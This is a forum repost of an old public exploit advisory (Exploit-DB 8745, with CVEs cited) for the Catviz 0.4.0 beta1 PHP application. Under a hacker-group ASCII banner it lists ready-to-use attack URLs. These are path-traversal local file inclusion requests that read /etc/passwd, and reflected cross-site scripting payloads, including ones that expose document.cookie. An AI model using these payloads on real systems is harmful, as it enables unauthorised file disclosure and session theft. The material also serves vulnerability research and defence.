Exploit Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8745
Проверка EDB
  1. Пройдено
Автор
BYALBAYX
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1749 cve-2009-1748
Дата публикации
2009-05-20
Код:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@
@~~=======================================~~@
@~~=Author   : ByALBAYX                     @
@                                           @
@~~=Website  : WWW.C4TEAM.ORG               @
@                                           @
@@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@
@
@              _.--"""""--._
@            .'             '.
@           /                 \
@          ;       C4TEAM      ;
@          |                   |
@          |                   |
@          ;                   ;
@           \ (`'--,    ,--'`) /
@            \ \  _ )  ( _  / /
@             ) )(')/  \(')( (
@            (_ `""` /\ `""` _)
@             \`"-, /  \ ,-"`/
@              `\ / `""` \ /`
@               |/\/\/\/\/\|
@               |\        /|
@               ; |/\/\/\| ;
@                \`-`--`-`/
@                 \      /
@                  ',__,'
@ 
@ Catviz 0.4.0 Beta 1
@ 
@ Demo:
@
@ http://catviz.sourceforge.net
@
@
@ LFI :/
@
@ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00
@
@ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00
@
@
@
@ XSS :/
@
@
@ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>
@
@ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>
@
@@@:/

# milw0rm.com [2009-05-20]
 
Источник
www.exploit-db.com

Похожие темы